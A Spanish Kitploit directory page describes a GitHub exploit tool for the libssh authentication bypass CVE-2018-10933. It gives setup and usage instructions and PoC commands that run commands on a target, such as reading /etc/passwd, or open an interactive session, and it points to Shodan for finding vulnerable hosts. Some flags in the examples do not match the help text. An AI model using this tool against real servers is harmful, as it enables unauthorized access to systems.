Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-10933 — libSSH-Authentication-Bypass | Kitploit
Herramientas/GitHubGitHub/rubikcuv5/cve-2018-10933
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de Penetración
GitHubrubikcuv5/cve-2018-10933

CVE-2018-10933

libSSH-Authentication-Bypass

Ver Repositorio
12hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-10933


Se encontró una vulnerabilidad en la máquina de estados del lado del servidor de libssh antes de las versiones 0.7.6 y 0.8.4. Un cliente malicioso podría crear canales sin realizar primero la autenticación, lo que resulta en acceso no autorizado.

ALGUNOS DETALLES

El problema proviene de la forma en que libssh no mantiene el estado de la autenticación y cómo se puede usar para omitir la autenticación. Básicamente, piense en la conexión como un proceso de varios pasos: paso1, paso2, paso3... Dado que libssh no exige el orden de los pasos, básicamente puede saltar al paso3 sin pasar por el paso1 y el paso2.

Curiosamente, el mismo problema se encontró anteriormente en la biblioteca SSH Paramiko: CVE-2018-7750.

Documentación

Exploit-DB : https://www.exploit-db.com/exploits/45638

Información sobre CVE-2018-10933 por libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Lanzamiento de corrección de errores por libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

Configuración

root@kitploit:~
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

Uso

root@kitploit:~
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   

EJEMPLOS POC

EJEMPLO (comprobar si el host es vulnerable)

root@kitploit:~
python3 main.py  0.0.0.0 -port 22  -t

EJEMPLO (enviar comando mediante argumento)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"

EJEMPLO (usando consola interactiva simple)

root@kitploit:~
python3 main.py  0.0.0.0 -p 22  -l

Shodan.io libSSH

root@kitploit:~
[!] can find  devices vulnerables using shodan.io 
-  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )

Autores

  • Rubickcuv
Descargar herramienta